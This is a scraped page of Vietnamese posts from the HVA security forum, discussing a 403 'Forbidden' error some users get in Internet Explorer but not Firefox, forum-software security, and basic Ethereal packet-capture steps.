--------------------------------------------------------------------------------
Forbidden!
The requested page or file is in the forbidden area.
Please click on ":::HVA:Forum:::" link above to get back to the home page.
--------------------------------------------------------------------------------
He he em pó tay luôn ??? cứ tự hỏi hổng lẽ mấy lão BQT HVA lại chặn các packet có Agent là Internet Explorer ??? Hey chắc là thù lão Bill lắm đây
Cái này khá phi lý. Error 403 được ấn định rất cẩn thận. Chỉ có trường hợp request cố tình đi vào khu vực cấm thì mới bị báo lỗi này. HVA không cản IE gì cả.
Cảnh báo IE7 ở trên xảy ra là vì security setting cho IE7 quá chặt. Sở dĩ có cảnh báo này vì trang chủ của HVA được encrypted. Nó cần access vào clipboard để tạm lưu thông tin đã được unencrypted, chỉ có thể thôi.
Mọi truy cập không hợp lệ như một trình duyệt bình thường sẽ bị đẩy ngược lại trang index mà không dính dáng gì đến error 403.
Hiện stats của HVA cho biết có đến trên 80% truy cập dùng IE (các phiên bản khác nhau) và truy cập thành công (status 200). Nếu quả thật HVA cản IE thì chẳng có mấy ai vào được HVA.
Vấn đề thú vị mà em không hỉu bác ạ
Nếu em dùng dịch vụ của FPT thì vô đc bằng IE
Còn nếu dùng VNN thì ặc chết khỏi vô phải dùng firefox
Một chú ý nữa là VNN cho user chui qua một Proxy của họ rùi mới vô mạng đc :?) ( cái proxy này họ cấu hình trên đường truyền luôn không thể đổi ). Có lẽ do cái firewall của HVA chặn lại do quá nhiều truy cập từ 1 IP chăng ????
Còn dấu chấm hỏi thiệt to là FireFox thì vô HVA ngon lành cho dù trường hợp nào đi nữa ... chưa tìm ra lời giải thích đáng
|
|
|
He he có vẻ tụi nhỏ bị lão làm hãi rồi .Em nghĩ là tụi nhỏ ngán cái vụ code này lão ạ
|
|
|
He thix diễn đàn bị hack thì cứ dùng .Khuyến cái vbulletin an toàn hơn ,nó đc coding rất kĩ càng ,bằng chứng là hơn nửa năm nay chưa có cái bug nào đáng để bàn.Còn IPB he he he quá rõ rồi hén
|
|
|
À mà cái nì đúng đó bác conmale à em cũng phải dùng tới FireFox mới bò vô đc còn IE thì nó báo là
::: H V A : F o r u m :::
--------------------------------------------------------------------------------
Cấm truy cập!
Trang hoặc hồ sơ muốn truy cập thuộc khu vực cấm.
Xin vui lòng bấm vào đường dẫn ":::HVA:Forum:::" để trở về trang chủ.
--------------------------------------------------------------------------------
Forbidden!
The requested page or file is in the forbidden area.
Please click on ":::HVA:Forum:::" link above to get back to the home page.
--------------------------------------------------------------------------------
He he em pó tay luôn ??? cứ tự hỏi hổng lẽ mấy lão BQT HVA lại chặn các packet có Agent là Internet Explorer ??? Hey chắc là thù lão Bill lắm đây
|
|
|
Ethereal mún bắt packet thì vô menu capture -> option -> cấu hình cho nó cap từ port nào đó theo giao thức nào đó vd: tcp 80.
Cap đc vừa ý thì nhấp fải vô cái đống cap đc chọn follow TCP Stream là nó ráp thành cả một stream data ,lúc đó tha hồ mà ngâm cứu
|
|
|
Hey chơi bằng tay mới lên level đc ,ai lại đi chơi code exploit mất cả thú vị khi tìm hiểu hacking theo ý kiến tôi thì cứ đọc qua discussion rồi tự mò là có thêm kiến thức về lỗi đó hơn là chỉ chăm chú thực hành
|
|
|
|
|
|
|